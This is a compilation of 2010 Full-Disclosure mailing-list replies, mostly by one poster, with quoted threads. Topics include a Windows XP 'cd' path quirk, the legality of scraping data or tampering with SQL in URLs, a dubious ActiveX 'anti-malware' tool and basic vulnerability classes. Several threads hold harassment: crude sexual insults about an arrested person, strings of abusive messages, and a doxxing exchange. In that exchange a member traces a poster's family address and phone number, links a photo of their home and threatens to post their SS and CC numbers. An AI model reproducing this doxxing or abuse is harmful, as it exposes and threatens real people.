This is fairly classic, not novel. Your POC is fairly classic, not novel. -Travis On Wed, Jul 7, 2010 at 1:54 PM, BlackHawk hawkgot...@gmail.com wrote: Hi list, i recently discovered a very small Windows XP bug, kind of useless alone but that could be usefull in some scenarios. Explanation: when you try to access a non existing directory though shell command cd, XP returns an error (obviously), but if you cd to a non-existing move one directory up, you'll not get any error. Example: --- C:\cd ./somerandomchars -- Will give an error Impossibile trovare il percorso specificato. C:\cd ./somerandomchars/../ -- Everything is ok C:\ --- PoC on how to make this thing usefull: http://www.scribd.com/doc/28080332/Podcast-Generator-1-3-Arbitrary-File-Download-Windows Hope this could be useful for you in some way.. -- BlackHawk - hawkgot...@gmail.com Sent with Gmail ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- FD1D E574 6CAB 2FAF 2921 F22E B8B7 9D0D 99FF A73C http://pgp.mit.edu:11371/pks/lookup?search=tbiehnop=indexfingerprint=on http://pastebin.com/f6fd606da ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] No anti-virus software? No internet connection
I wonder if someone writes down all that pseudo-intellectual philosophical bullshit that is so carefully crafted by FD members (myself included)? Maybe I should: ??? Profit -Travis On Thu, Jun 24, 2010 at 5:45 AM, Walter van Holst walter.van.ho...@xs4all.nl wrote: On Thu, June 24, 2010 11:08, valdis.kletni...@vt.edu wrote: The answer to that kind of question is quite often related to the industry average. For example no more failures than one standard deviation below the industry average. Ahh.. but that doesn't really help either. Consider that not all failures are created equal. Should a failure to detect some unknown basically harmless strain that's only been seen on 4 machines in Zimbabwe count the same as failing to notice that a machine is still infected with Code Red or something that's virulent and malicious and on a very large current burn? Do you even care it didn't detect the Zimbabwe strain your machine has never been exposed to? Of course any way of measuring it will be fundamentally flawed in certain ways. There is always that pesky 80/20 or 90/10 rule. And you can of course figure out a way of correcting for corner cases, but that will only create additional corner cases. That's what makes lawyering on product liability a craft at best and usually some form of black magic. For that matter, do you really want to create a situation where the various A/V companies now have an *incentive* to make sure their competitors don't detect something (either by failing to share data, or resorting to having malware custom-crafted)? The only reason the whole A/V industry And yes, there may very well be unintended consequences. Nonetheless, I feel the era of complete exoneration from product liability is coming to an end for packaged software. Especially in the security industry. It is just a matter of an 'unsafe at any speed' moment occurring and there will be legislation, however braindead such legislation may be from an engineering viewpoint. Call me a pessimist, but we've been putting way too much critical stuff on internet connected systems while at the same neglecting basic hygiene at every level not to have some disaster to happen. It isn't so much a question of if but when that will happen. Regards, Walter ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- FD1D E574 6CAB 2FAF 2921 F22E B8B7 9D0D 99FF A73C http://pgp.mit.edu:11371/pks/lookup?search=tbiehnop=indexfingerprint=on http://pastebin.com/f6fd606da ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Congratulations Andrew
Ouch dude: http://www.cbc.ca/canada/toronto/story/2010/06/23/tor-g20-arrest.html Guess you ate a dick too. On Wed, Jun 16, 2010 at 7:05 PM, Byron Sonne blso...@halvdan.com wrote: Looks like Andrew/weev/n3td3v finally gets to do what he likes the most Performing fellatio on his fellow inmates http://www.theregister.co.uk/2010/06/16/auernheimer_arrested/ Oh man, pretty sweet! I've been waiting years to see weev eat a dick, and the time has come at last. Maybe there is a god. -- Byron L. Sonne :: blso...@halvdan.com :: www.halvdan.com gpg: 0x69D9EAA6, C651 EF07 1298 58B3 615D 4019 E196 BAE1 69D9 EAA6 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- FD1D E574 6CAB 2FAF 2921 F22E B8B7 9D0D 99FF A73C http://pgp.mit.edu:11371/pks/lookup?search=tbiehnop=indexfingerprint=on http://pastebin.com/f6fd606da ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Congratulations Andrew
Didn't Philip K. Dick wrote about this sort of thing in Radio Free Albemuth? I doubt the search warrant will hold up in court. -Travis On Wed, Jun 16, 2010 at 9:27 AM, Milan Berger m.ber...@project-mindstorm.net wrote: Looks like Andrew/weev/n3td3v finally gets to do what he likes the most Performing fellatio on his fellow inmates http://www.theregister.co.uk/2010/06/16/auernheimer_arrested/ looks to good to be true. Is the longlife FD really away? Would be great! -- Kind Regards Milan Berger Project-Mindstorm Technical Engineer ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- FD1D E574 6CAB 2FAF 2921 F22E B8B7 9D0D 99FF A73C http://pgp.mit.edu:11371/pks/lookup?search=tbiehnop=indexfingerprint=on http://pastebin.com/f6fd606da ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Congratulations Andrew
Yes. The FBI was investigating the ATT incident, presumably the ATT incident was what the fed were serving against. What possible valid search warrant could be executed? There was no hack, breach, illegal access of data, or anything else for that matter. If you leave a system online with no password which allows you to scrape content you have a legal right to scrape that content. -Travis On Wed, Jun 16, 2010 at 11:10 AM, valdis.kletni...@vt.edu wrote: On Wed, 16 Jun 2010 10:09:22 EDT, T Biehn said: I doubt the search warrant will hold up in court. Do you have any actual basis for saying that? Sure, the warrant might be bullshit, it might be solid - the article doesn't give us enough info either way to tell. Auernheimer was also arrested in March for giving a false name to law enforcement officers responding to a parking complaint. Sad. The dude may have the intelligence to pull the hack, but not have the wisdom to not dig a hole deeper. Just man up and take the frikking parking ticket. ;) -- FD1D E574 6CAB 2FAF 2921 F22E B8B7 9D0D 99FF A73C http://pgp.mit.edu:11371/pks/lookup?search=tbiehnop=indexfingerprint=on http://pastebin.com/f6fd606da ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Congratulations Andrew
So what grants you legal access to aol.com (HTTP port 80 get / )? I'm confused? Does search engine indexing grant legal access to online resources? -Travis On Wed, Jun 16, 2010 at 3:34 PM, Thor (Hammer of God) t...@hammerofgod.comwrote: By the same logic, then yes you would. Which is why the statement “if a system has no password, then you have a legal right to whatever data is on it” is complete horse hockey. Don’t take technical advice from your lawyer, and don’t take legal advice from people on security lists. t *From:* full-disclosure-boun...@lists.grok.org.uk [mailto: full-disclosure-boun...@lists.grok.org.uk] *On Behalf Of *wilder_jeff Wilder *Sent:* Wednesday, June 16, 2010 11:56 AM *To:* full-disclosure@lists.grok.org.uk *Subject:* Re: [Full-disclosure] Congratulations Andrew By that same standard.. if you leave your house unlocked does that give someone the right to enter it? just my thoughts -- Date: Wed, 16 Jun 2010 19:58:27 +0200 From: uuf6...@gmail.com To: tbi...@gmail.com CC: full-disclosure@lists.grok.org.uk; valdis.kletni...@vt.edu Subject: Re: [Full-disclosure] Congratulations Andrew Reminds be of Al Capone and tax evasion ;-) Good ol' America. On Wed, Jun 16, 2010 at 7:49 PM, T Biehn tbi...@gmail.com wrote: Yes. The FBI was investigating the ATT incident, presumably the ATT incident was what the fed were serving against. What possible valid search warrant could be executed? There was no hack, breach, illegal access of data, or anything else for that matter. If you leave a system online with no password which allows you to scrape content you have a legal right to scrape that content. -Travis On Wed, Jun 16, 2010 at 11:10 AM, valdis.kletni...@vt.edu wrote: On Wed, 16 Jun 2010 10:09:22 EDT, T Biehn said: I doubt the search warrant will hold up in court. Do you have any actual basis for saying that? Sure, the warrant might be bullshit, it might be solid - the article doesn't give us enough info either way to tell. Auernheimer was also arrested in March for giving a false name to law enforcement officers responding to a parking complaint. Sad. The dude may have the intelligence to pull the hack, but not have the wisdom to not dig a hole deeper. Just man up and take the frikking parking ticket. ;) -- FD1D E574 6CAB 2FAF 2921 F22E B8B7 9D0D 99FF A73C http://pgp.mit.edu:11371/pks/lookup?search=tbiehnop=indexfingerprint=on http://pastebin.com/f6fd606da ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- The New Busy is not the old busy. Search, chat and e-mail from your inbox. Get started.http://www.windowslive.com/campaign/thenewbusy?ocid=PID28326::T:WLMTAGL:ON:WL:en-US:WM_HMP:042010_3 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- FD1D E574 6CAB 2FAF 2921 F22E B8B7 9D0D 99FF A73C http://pgp.mit.edu:11371/pks/lookup?search=tbiehnop=indexfingerprint=on http://pastebin.com/f6fd606da ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Congratulations Andrew
Furthermore if I access an online resource and I notice that the information ends and the URL has a page=1 on the end and no link exists on that page to say... page=2 is that illegal? On the same note, if I notice something that looks like a SELECT statement in a URL (due to excellent coding) is it illegal for me to modify that SELECT statement to return other information? Is the legality of access to the resource something that must be explicitly granted to me or is it some abstract property depending on the content I've accessed? Is it legal to randomly fuzz web service arguments without knowing the data that it will return? Usually systems of this nature will have an EXPLICIT notice that you cannot access data on it unless you're authorized OR will require (as it does now) authentication. Did the ICCID count as authentication if it is not explicitly labeled by ATT as such? A field like: password would clearly be illegal to brute force. An analogy to a case with CLEARLY AND EXPLICITLY defined law regarding private property doesn't really seem to fit. -Travis On Wed, Jun 16, 2010 at 3:58 PM, T Biehn tbi...@gmail.com wrote: So what grants you legal access to aol.com (HTTP port 80 get / )? I'm confused? Does search engine indexing grant legal access to online resources? -Travis On Wed, Jun 16, 2010 at 3:34 PM, Thor (Hammer of God) t...@hammerofgod.com wrote: By the same logic, then yes you would. Which is why the statement “if a system has no password, then you have a legal right to whatever data is on it” is complete horse hockey. Don’t take technical advice from your lawyer, and don’t take legal advice from people on security lists. t *From:* full-disclosure-boun...@lists.grok.org.uk [mailto: full-disclosure-boun...@lists.grok.org.uk] *On Behalf Of *wilder_jeff Wilder *Sent:* Wednesday, June 16, 2010 11:56 AM *To:* full-disclosure@lists.grok.org.uk *Subject:* Re: [Full-disclosure] Congratulations Andrew By that same standard.. if you leave your house unlocked does that give someone the right to enter it? just my thoughts -- Date: Wed, 16 Jun 2010 19:58:27 +0200 From: uuf6...@gmail.com To: tbi...@gmail.com CC: full-disclosure@lists.grok.org.uk; valdis.kletni...@vt.edu Subject: Re: [Full-disclosure] Congratulations Andrew Reminds be of Al Capone and tax evasion ;-) Good ol' America. On Wed, Jun 16, 2010 at 7:49 PM, T Biehn tbi...@gmail.com wrote: Yes. The FBI was investigating the ATT incident, presumably the ATT incident was what the fed were serving against. What possible valid search warrant could be executed? There was no hack, breach, illegal access of data, or anything else for that matter. If you leave a system online with no password which allows you to scrape content you have a legal right to scrape that content. -Travis On Wed, Jun 16, 2010 at 11:10 AM, valdis.kletni...@vt.edu wrote: On Wed, 16 Jun 2010 10:09:22 EDT, T Biehn said: I doubt the search warrant will hold up in court. Do you have any actual basis for saying that? Sure, the warrant might be bullshit, it might be solid - the article doesn't give us enough info either way to tell. Auernheimer was also arrested in March for giving a false name to law enforcement officers responding to a parking complaint. Sad. The dude may have the intelligence to pull the hack, but not have the wisdom to not dig a hole deeper. Just man up and take the frikking parking ticket. ;) -- FD1D E574 6CAB 2FAF 2921 F22E B8B7 9D0D 99FF A73C http://pgp.mit.edu:11371/pks/lookup?search=tbiehnop=indexfingerprint=on http://pastebin.com/f6fd606da ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- The New Busy is not the old busy. Search, chat and e-mail from your inbox. Get started.http://www.windowslive.com/campaign/thenewbusy?ocid=PID28326::T:WLMTAGL:ON:WL:en-US:WM_HMP:042010_3 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- FD1D E574 6CAB 2FAF 2921 F22E B8B7 9D0D 99FF A73C http://pgp.mit.edu:11371/pks/lookup?search=tbiehnop=indexfingerprint=on http://pastebin.com/f6fd606da -- FD1D E574 6CAB 2FAF 2921 F22E B8B7 9D0D 99FF A73C http://pgp.mit.edu:11371/pks/lookup?search=tbiehnop=indexfingerprint=on http://pastebin.com/f6fd606da ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Microsoft Windows Help Centre Handles Malformed Escape Sequences Incorrectly
It's a good thing I ran that anti-hacker script!!! On Fri, Jun 11, 2010 at 11:28 AM, Benji m...@b3nji.com wrote: because when she gets 0wn3d she can be all like 'ruh roh, well, 0day can happen to anyone' On Fri, Jun 11, 2010 at 4:01 PM, Benjamin Franz jfr...@freerun.com wrote: On 06/11/2010 02:40 AM, Christian Sciberras wrote: In my humble opinion, he could have waited a couple more days just in case Microsoft decided to do the unprecedented. In which case, I progressive change of policies at Microsoft are better than a couple of users getting hacked from pron sites... As I said: Travis indicated in his original post he believes the exploit *was already being used in the wild*. So NOT releasing it wouldn't protect users. It would just keep it secret from everyone except Microsoft *and the black hats who were already using it*. While maintaining a false air of intact security for everyone else. That is better, how? -- Benjamin Franz ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- FD1D E574 6CAB 2FAF 2921 F22E B8B7 9D0D 99FF A73C http://pgp.mit.edu:11371/pks/lookup?search=tbiehnop=indexfingerprint=on http://pastebin.com/f6fd606da ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Microsoft Windows Help Centre Handles Malformed Escape Sequences Incorrectly
Totally, I'd work on getting a dog too. On Jun 11, 2010 12:20 PM, musnt live musntl...@gmail.com wrote: On Fri, Jun 11, 2010 at 12:03 PM, T Biehn tbi...@gmail.com wrote: It's a good thing I ran that a... It's a good thing there is to be a local bomb squad near me. http://www.cbc.ca/world/story/2005/06/13/canadian-bomb050613.html ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Microsoft Windows Help Centre Handles Malformed Escape Sequences Incorrectly
So far so good. You've been able to go from t biehn - Travis Biehn - Bomber Article (parent's names, city, state, country) - whitepages.com (Address and Phone number) - (not clear on your jump here, did you google their name or for the address?) Real estate listings. Now to pull the SS and CC #'s you're going to have to go the extra mile. I'd enjoy seeing you pull our SS numbers, being that we're all Canadians. -Travis On Fri, Jun 11, 2010 at 1:50 PM, musnt live musntl...@gmail.com wrote: On Fri, Jun 11, 2010 at 1:43 PM, T Biehn tbi...@gmail.com wrote: Maybe you can call twice and get both of them really upset? Maybe I will. Would she let me sit on her bed? http://images.realogyfg.com/j/2/5/15907460/62A47ADD-C353-4F73-94FB-742937D88A0B-6.jpg Oh n00z all this information for on this little wannabe unabummer. Go play now with some explosives and fux0r yourself before I is posting your family's SS CC #'s rookie -- FD1D E574 6CAB 2FAF 2921 F22E B8B7 9D0D 99FF A73C http://pgp.mit.edu:11371/pks/lookup?search=tbiehnop=indexfingerprint=on http://pastebin.com/f6fd606da ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Hacxx Anti Malware for Windows XP
What the fuck. On Mon, Jun 7, 2010 at 7:52 AM, hacxx20 hacx...@gmail.com wrote: Hi, I have been developing a tool in batch to block general malware for some time now and recently i found an exploit that can add the registry keys from a web browser. Hacxx Anti Malware for Windows XP blocks virus and worms using known filenames. To install it simply visit http:///antimalware.x10.bz and click in Run Hacxx Anti Malware. You must accept the ActiveX and the source is available in the site. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- FD1D E574 6CAB 2FAF 2921 F22E B8B7 9D0D 99FF A73C http://pgp.mit.edu:11371/pks/lookup?search=tbiehnop=indexfingerprint=on http://pastebin.com/f6fd606da ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Hacxx Anti Malware for Windows XP
Actually, The code is clean (Yes I looked), other than him setting his website as the search provider for IE. -Travis On Mon, Jun 7, 2010 at 10:49 AM, mrsta...@gmail.com wrote: All it takes is one. Same with the email spamming crap Sent on the Sprint® Now Network from my BlackBerry® -Original Message- From: netinfinity netinfinity.security...@gmail.com Date: Mon, 7 Jun 2010 16:17:28 To: full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] Hacxx Anti Malware for Windows XP ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- FD1D E574 6CAB 2FAF 2921 F22E B8B7 9D0D 99FF A73C http://pgp.mit.edu:11371/pks/lookup?search=tbiehnop=indexfingerprint=on http://pastebin.com/f6fd606da ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Hacxx Anti Malware for Windows XP
I installed it too, and then I noticed a few other websites that were asking me for activex privileges as well so I accepted their anti-malware. Now I'm unhackable. -Travis On Mon, Jun 7, 2010 at 4:32 PM, Christian Sciberras uuf6...@gmail.comwrote: Im new to computers, what is wrong with antimalware programs? And you're subscribed to this list? You don't install anything anyone throws around, especially when not from a trusted source... On Mon, Jun 7, 2010 at 10:31 PM, Benji m...@b3nji.com wrote: Im new to computers, what is wrong with antimalware programs? On Mon, Jun 7, 2010 at 9:28 PM, Christian Sciberras uuf6...@gmail.com wrote: Uhm...just clear those registry entries? Don't tell me you *did* install it? ;) You know what they say about cats and curiosity On Mon, Jun 7, 2010 at 10:23 PM, Benji m...@b3nji.com wrote: on an unrelated note, would anyone know how to uninstall this? thx intentrnets. On Mon, Jun 7, 2010 at 4:27 PM, T Biehn tbi...@gmail.com wrote: Actually, The code is clean (Yes I looked), other than him setting his website as the search provider for IE. -Travis On Mon, Jun 7, 2010 at 10:49 AM, mrsta...@gmail.com wrote: All it takes is one. Same with the email spamming crap Sent on the Sprint® Now Network from my BlackBerry® -Original Message- From: netinfinity netinfinity.security...@gmail.com Date: Mon, 7 Jun 2010 16:17:28 To: full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] Hacxx Anti Malware for Windows XP ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- FD1D E574 6CAB 2FAF 2921 F22E B8B7 9D0D 99FF A73C http://pgp.mit.edu:11371/pks/lookup?search=tbiehnop=indexfingerprint=on http://pastebin.com/f6fd606da ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- FD1D E574 6CAB 2FAF 2921 F22E B8B7 9D0D 99FF A73C http://pgp.mit.edu:11371/pks/lookup?search=tbiehnop=indexfingerprint=on http://pastebin.com/f6fd606da ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] The_UT is repenting
I don't think UT is anyone's 'boy toy.' The guy is massive. I'm sure he'll meet all kinds of experienced scam artists and criminals and learn all sorts of neat things for use when he gets out. -Travis On Tue, Jun 1, 2010 at 6:13 AM, Anders Klixbull a...@experian.dk wrote: I'm so sorry that your friend was retarded enough to get busted. And thank you for the archive! It's always nice to have a personal librarian :) You may be sorry for the repeat material, but please go suck a lemon. Thanks. -Oprindelig meddelelse- Fra: ghost [mailto:gho...@gmail.com] Sendt: 1. juni 2010 11:35 Til: Anders Klixbull Cc: full-disclosure@lists.grok.org.uk Emne: Re: [Full-disclosure] The_UT is repenting Anders - i'm very sorry, you must of confused this mailing list with astalavista forums. Please go away... or kill yourself, whichever you prefer.. and in the interest of full-disclosure, I have my fingers crossed for the latter :) Thanks. - Re: by Anders Klixbull in full-disclosure@lists.grok.org.uk (31613 messages) Please stop stating the obvious. Keep in mind that to us your useless replies are of no importance. Re: by Anders Klixbull in full-disclosure@lists.grok.org.uk (31613 messages) But their website graphics is super cool! Re: by Anders Klixbull in full-disclosure@lists.grok.org.uk (31613 messages) we care we really do From fulldisclosureboun...@list... Re: by Anders Klixbull in full-disclosure@lists.grok.org.uk (31613 messages) take a chill pill wigger Re: by Anders Klixbull in full-disclosure@lists.grok.org.uk (31613 messages) shut the fuck up From fulldisclosureboun...@list... Re: by Anders Klixbull in full-disclosure@lists.grok.org.uk (31613 messages) then you gadi and n3td3v should jump off a cliff Re: by Anders Klixbull in full-disclosure@lists.grok.org.uk (31613 messages) Apology not accepted! Alcohol is required! Re: by Anders Klixbull in full-disclosure@lists.grok.org.uk (31613 messages) ) If im ever near there i will look you up! Cheers Re: by Anders Klixbull in full-disclosure@lists.grok.org.uk (31613 messages) Thinking a little highly of yourself arent you? Saving the world lol lol lol Keep your moronic comics to yourself please Re: by Anders Klixbull in full-disclosure@lists.grok.org.uk (31613 messages) 0day pictures of Mark's mom for sale From fulldisclosureboun...@list... Re: by Anders Klixbull in full-disclosure@lists.grok.org.uk (31613 messages) Keep your talentless tripe to yourself Re: by Anders Klixbull in full-disclosure@lists.grok.org.uk (31613 messages) You're obviously retarded Re: by Anders Klixbull in full-disclosure@lists.grok.org.uk (31613 messages) You forgot to include MiniMySqlat0r01.jar in your zip file.. Re: by Anders Klixbull in full-disclosure@lists.grok.org.uk (31613 messages) ! Re: by Anders Klixbull in full-disclosure@lists.grok.org.uk (31613 messages) Free 0day for all!! Re: by Anders Klixbull in full-disclosure@lists.grok.org.uk (31613 messages) Fuck the vendors put them on FD Re: by Anders Klixbull in full-disclosure@lists.grok.org.uk (31613 messages) Go suck a lemon bitch Re: by Anders Klixbull in full-disclosure@lists.grok.org.uk (31613 messages) The hardcore cockgobbler scene of scotland Re: by Anders Klixbull in full-disclosure@lists.grok.org.uk (31613 messages) TEH TXT FIEL FORMATTING SI TEH FUCKED From fulldisclosureboun...@list... Re: by Anders Klixbull in full-disclosure@lists.grok.org.uk (31613 messages) Religion is nothing more than mental crutches for weakminded people Message Results Re: by Anders Klixbull in full-disclosure@lists.grok.org.uk (31613 messages) But isnt that where you feel most at home brother n3td3v? Re: by Anders Klixbull in full-disclosure@lists.grok.org.uk (31613 messages) Because we are drawn to you like moths to a flame Re: by Anders Klixbull in full-disclosure@lists.grok.org.uk (31613 messages) It's safe to assume that it covers the both of you ignorant turds Re: by Anders Klixbull in full-disclosure@lists.grok.org.uk (31613 messages) Nice teenspeak maybe your mother can invite n3td3v over to hot cocoa and cookies? Re: by Anders Klixbull in full-disclosure@lists.grok.org.uk (31613 messages) removing anyone is pointless From fulldisclosureboun...@list... Re: by Anders Klixbull in full-disclosure@lists.grok.org.uk (31613 messages) Project chroma project? Welcome to the redundancy department of redundancy.. Mike c aka n3td3v shut the fuck up Re: by Anders Klixbull in full-disclosure@lists.grok.org.uk (31613 messages) retardo Re: by Anders Klixbull in full-disclosure@lists.grok.org.uk (31613 messages) Are you smoking crack? Re: by Anders Klixbull in full-disclosure@lists.grok.org.uk (31613 messages) Helol n3td3v Re: by Anders Klixbull in full-disclosure@lists.grok.org.uk (31613 messages) go
Re: [Full-disclosure] Stealthier Internet access
Bipin; Firstly: You know what you did. Secondly: Screw you for not crediting the master. (I am the master, you are the dog.) Greetz Love, Harmonious Profitability! -Travis On Wed, May 26, 2010 at 1:03 AM, valdis.kletni...@vt.edu wrote: On Wed, 26 May 2010 10:15:32 +0545, Bipin Gautam said: it's a *bad* sector, so reading and recovering the data is a bitch... No, storing in Negative Disk, bad sector, stenography, slack space are all bad places to store data! No, I meant it's usually not worth worrying that if the disk has done a hardware assignment of a replacement sector for a *real* live actual the-hardware-barfs-on-it bad sector, you can usually not worry about the contents of that bad sector, as the drive hardware won't let you access it directly anymore, redirecting you to the new replacement block. So basically, somebody needs to take the disk apart and start doing the clean-room data recovery routine off the disk, trying to read 512 bytes of data at a time off known-physically-bad areas of the disk. And if your threat model includes adversaries that will do that, then you *really* need to be using full-disk encryption and thermite in your counter-defenses. Oh, and a good countermeasure for rubber-hose crypto. ;) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- FD1D E574 6CAB 2FAF 2921 F22E B8B7 9D0D 99FF A73C http://pgp.mit.edu:11371/pks/lookup?search=tbiehnop=indexfingerprint=on http://pastebin.com/f6fd606da ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] What are the basic vulnerabilities of a software?
Misuse, mis-implementation of cryptographic primitives. Errors in state based code, skipping authentication states and moving to authenticated states, for instance. For everything else see whatever publication. Why did I answer this :( -Travis On Mon, May 31, 2010 at 8:56 AM, Christian Sciberras uuf6...@gmail.comwrote: 0. Human error. On Mon, May 31, 2010 at 11:50 AM, rajendra prasad rajendra.paln...@gmail.com wrote: Hi List, I am preparing a list of main and basic vulnerabilities in software. Please let me know If you know other than the below list. List of Basic Vulnerabilities: 1. Buffer Overflow: Stack, Heap. 2. Format String Vulnerabilities 3. SQL Injections 4. XSS Vulnerabilities Thanks Rajendra Prasad.Palnaty ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- FD1D E574 6CAB 2FAF 2921 F22E B8B7 9D0D 99FF A73C http://pgp.mit.edu:11371/pks/lookup?search=tbiehnop=indexfingerprint=on http://pastebin.com/f6fd606da ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] What do you guys think about it?
If you thought this article had any merit then it is true for you. Swap over to Hamburger University kids, nothing to see here. If you thought this article was bullshit then that is true for you. It's just too bad this wasn't by design, eh? -Travis On Mon, May 31, 2010 at 12:04 PM, Georgi Guninski gunin...@guninski.comwrote: why discriminate the gals? if we are lucky there may be a gal or 2 left on the nice list ;) On Fri, May 28, 2010 at 04:18:58PM -0300, Rafael Moraes wrote: Read and give your opinion! http://www.networkworld.com/community/node/60303 -- Att, Rafael Moraes Linux Professional Institute Certified - LPI 2 Novell Certified Linux Administrator - CLA Data Center Technical Specialist - DCTS ITIL Foundations Certified ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- FD1D E574 6CAB 2FAF 2921 F22E B8B7 9D0D 99FF A73C http://pgp.mit.edu:11371/pks/lookup?search=tbiehnop=indexfingerprint=on http://pastebin.com/f6fd606da ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] What do you guys think about it?
How is it open to debate? He tells you where security as a career isn't dead. You act as a cog in the SaaS machine. You research stuff. The system admin who specializes in security has died and given way to the specialized sys admin and a purely security oriented individual. The security oriented individuals work for your sourcefires of the world. -Travis On Mon, May 31, 2010 at 5:14 PM, Christian Sciberras uuf6...@gmail.comwrote: Regardless of merit, it is open to debate. Let's just hypothesize that it was. ;-) On Mon, May 31, 2010 at 6:23 PM, T Biehn tbi...@gmail.com wrote: If you thought this article had any merit then it is true for you. Swap over to Hamburger University kids, nothing to see here. If you thought this article was bullshit then that is true for you. It's just too bad this wasn't by design, eh? -Travis On Mon, May 31, 2010 at 12:04 PM, Georgi Guninski gunin...@guninski.comwrote: why discriminate the gals? if we are lucky there may be a gal or 2 left on the nice list ;) On Fri, May 28, 2010 at 04:18:58PM -0300, Rafael Moraes wrote: Read and give your opinion! http://www.networkworld.com/community/node/60303 -- Att, Rafael Moraes Linux Professional Institute Certified - LPI 2 Novell Certified Linux Administrator - CLA Data Center Technical Specialist - DCTS ITIL Foundations Certified ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - 